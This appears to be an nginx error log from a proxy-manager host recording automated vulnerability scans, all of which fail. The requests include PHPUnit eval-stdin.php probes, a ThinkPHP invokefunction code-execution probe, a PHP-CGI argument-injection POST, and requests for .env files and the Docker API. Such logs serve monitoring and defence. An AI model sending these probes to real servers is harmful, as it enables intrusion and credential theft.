2026/02/17 17:01:34 [error] 920#920: *71526 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:36 [error] 920#920: *71526 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:38 [error] 920#920: *71526 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:41 [error] 920#920: *71526 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:44 [error] 920#920: *71526 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:47 [error] 920#920: *71526 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:49 [error] 920#920: *71526 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:51 [error] 920#920: *71526 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:53 [error] 920#920: *71526 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:54 [error] 920#920: *71526 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 17:01:59 [error] 920#920: *71526 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 94.72.116.78, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80"
2026/02/17 22:33:02 [error] 928#928: *92796 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 52.186.171.52, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "222.117.41.51"
2026/02/18 03:04:21 [error] 939#939: *93612 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:50:31 [error] 940#940: *93741 open() "/var/www/html/aaa9" failed (2: No such file or directory), client: 45.91.64.7, server: localhost-nginx-proxy-manager, request: "GET /aaa9 HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:50:31 [error] 940#940: *93743 open() "/var/www/html/aab9" failed (2: No such file or directory), client: 45.91.64.7, server: localhost-nginx-proxy-manager, request: "GET /aab9 HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:53:41 [error] 940#940: *93747 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:53:44 [error] 940#940: *93747 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:53:46 [error] 940#940: *93747 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:53:48 [error] 940#940: *93747 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:53:49 [error] 940#940: *93747 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:53:50 [error] 940#940: *93747 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:53:52 [error] 940#940: *93747 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:53:53 [error] 940#940: *93747 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:53:55 [error] 940#940: *93747 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:53:56 [error] 940#940: *93747 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:53:58 [error] 940#940: *93747 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:53:59 [error] 940#940: *93747 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:01 [error] 940#940: *93747 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:02 [error] 940#940: *93747 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:04 [error] 940#940: *93747 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:05 [error] 940#940: *93747 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:07 [error] 940#940: *93747 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:08 [error] 940#940: *93747 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:10 [error] 940#940: *93747 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:11 [error] 940#940: *93747 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:13 [error] 940#940: *93747 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:14 [error] 940#940: *93747 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:15 [error] 940#940: *93747 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:16 [error] 940#940: *93747 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:17 [error] 940#940: *93747 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:18 [error] 940#940: *93747 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:19 [error] 940#940: *93747 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:20 [error] 940#940: *93747 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:21 [error] 940#940: *93747 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:22 [error] 940#940: *93747 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:23 [error] 940#940: *93747 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:24 [error] 940#940: *93747 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:25 [error] 940#940: *93747 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:26 [error] 940#940: *93747 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:26 [error] 940#940: *93747 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:27 [error] 940#940: *93747 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:29 [error] 940#940: *93747 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:29 [error] 940#940: *93747 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:30 [error] 940#940: *93747 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:31 [error] 940#940: *93747 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 04:54:34 [error] 940#940: *93747 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:36:24 [error] 941#941: *93757 open() "/var/www/html/login" failed (2: No such file or directory), client: 193.142.146.230, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:49:02 [error] 943#943: *95249 open() "/var/www/html/login" failed (2: No such file or directory), client: 206.168.34.44, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "222.117.41.51"
2026/02/18 05:54:43 [error] 943#943: *95252 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:43 [error] 943#943: *95252 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:43 [error] 943#943: *95252 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:44 [error] 943#943: *95252 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:44 [error] 943#943: *95252 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:44 [error] 943#943: *95252 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:45 [error] 943#943: *95252 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:45 [error] 943#943: *95252 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:45 [error] 943#943: *95252 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:46 [error] 943#943: *95252 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:46 [error] 943#943: *95252 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:46 [error] 943#943: *95252 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:47 [error] 943#943: *95252 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:47 [error] 943#943: *95252 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:47 [error] 943#943: *95252 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:48 [error] 943#943: *95252 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:48 [error] 943#943: *95252 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:48 [error] 943#943: *95252 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:48 [error] 943#943: *95252 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:49 [error] 943#943: *95252 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:49 [error] 943#943: *95252 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:49 [error] 943#943: *95252 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:50 [error] 943#943: *95252 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:50 [error] 943#943: *95252 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:50 [error] 943#943: *95252 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:50 [error] 943#943: *95252 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:51 [error] 943#943: *95252 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:51 [error] 943#943: *95252 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:51 [error] 943#943: *95252 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:52 [error] 943#943: *95252 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:52 [error] 943#943: *95252 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:52 [error] 943#943: *95252 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:53 [error] 943#943: *95252 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
2026/02/18 05:54:53 [error] 943#943: *95252 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80"
